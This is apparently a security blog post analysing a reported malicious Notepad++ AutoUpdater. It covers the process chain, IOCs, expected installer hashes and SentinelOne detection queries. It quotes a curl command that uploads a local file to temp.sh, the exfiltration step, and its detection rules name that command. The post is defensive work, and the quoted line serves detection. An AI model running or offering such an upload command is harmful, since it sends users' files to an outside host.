NotePad++ malicious AutoUpdate

Written By David Vineyard

BLUF

Recent security alerts related to the Notepad++ AutoUpdater have identified a malicious command involving curl.exe and a connection to the domain temp.sh for data exfiltration. The activity involves a suspicious AutoUpdater.exe spawned by gup.exe, the legitimate Notepad++ updater program. 

Malicious Activity Details

  • Command Line Seen: The malicious command observed was curl.exe -F "file=@a.txt" -s https://temp[.]sh/upload, which appears to be exfiltrating data from a file named a.txt to a malicious domain temp.sh.

  • Process Chain: The attack sequence typically involves the main notepad++.exe spawning its updater component, gup.exe (GUI Updater), which then spawns a temporary AutoUpdater.exe in the user's AppData\Local\Temp\ directory to perform the actual update process. The malicious activity originates from this temporary AutoUpdater.exe.

  • Affected Versions/Timeframe: The issue was reported in October 2025, potentially related to version 8.8.4. Earlier versions (like 8.8.2 in July 2025) have also been associated with other malware flags (Fareit, Azorult, Loki) related to the update mechanism, though these are often attributed to the installer's lack of digital signature or general vulnerabilities rather than the exact curl.exe command.

  • Vulnerabilities: The attack exploits potential DLL hijacking opportunities within the Notepad++ plugin or updater mechanisms, where attackers can drop malicious DLLs or leverage legitimate tools like curl.exe for malicious purposes.

IOCs

·         curl.exe -F "file=@a.txt" -s https://temp[.]sh/uploa

Sample SHA256

·         SHA256 examples do not appear to be publicly available

Expected notepad++ sha256s

npp.8.8.8.Installer.exe (32-bit/x86)

·         a19aa1cd7ecb9ca3f1fd0e118fffd0d673fba404ced8c39c2e210a63b70f9c15

npp.8.8.8.Installer.x64.exe (64-bit)

·         6126620593b4a2f8149e8a71221b6d21d5a7102e3b2e3571d4a0429402517208

npp.8.8.8.Installer.arm64.exe (ARM64)

·         e163697b981c317982c2633872259004bb33df6d08f7561dac3832e05ca9e36c

Suggested SentinelOne Reports

These are indicator reports they might be noisy but would identify potential malicious activity

 

·         Detect Outbound Connections to temp.sh

This query targets the primary network IOC: an outbound connection to the malicious domain used for data exfiltration.

sql

EndpointName = 'curl.exe' OR EndpointName = 'AutoUpdater.exe' OR EndpointName = 'gup.exe'

AND Network.RemoteUrl CONTAINS 'temp.sh'

 

·         Detect curl.exe Being Spawned by Notepad++ Updaters

This query searches for the specific, highly suspicious process creation chain where a curl.exe process is started by gup.exe or AutoUpdater.exe.

sql

EventType = 'Process Creation'

AND ParentProcName IN ('gup.exe', 'AutoUpdater.exe')

AND EndpointName = 'curl.exe'

 

·         Detect curl.exe Uploading Data via Command Line

This query looks for the specific command-line arguments used in the attack, where curl.exe is told to upload a file (-F "file=...") to any suspicious URL.

sql

EventType = 'Process Creation'

AND EndpointName = 'curl.exe'

AND ProcessCmdLine CONTAINS ' -F "file='

AND ProcessCmdLine CONTAINS 'upload'

 

·         Detect AutoUpdater.exe in the Temp Directory

A legitimate gup.exe usually resides in the Notepad++ installation directory. The malicious AutoUpdater.exe is often dropped into the temporary directory (AppData\Local\Temp\).

sql

EventType = 'Process Creation'

AND EndpointName = 'AutoUpdater.exe'

AND ProcessImagePath CONTAINS 'AppData\\Local\\Temp

References

Community notepad-plus-plus org

·         hxxps://community.notepad-plus-plus.org/topic/27212/autoupdater-and-connection-temp-sh

David Vineyard
Previous

ValleyRAT Job Seeker Campaign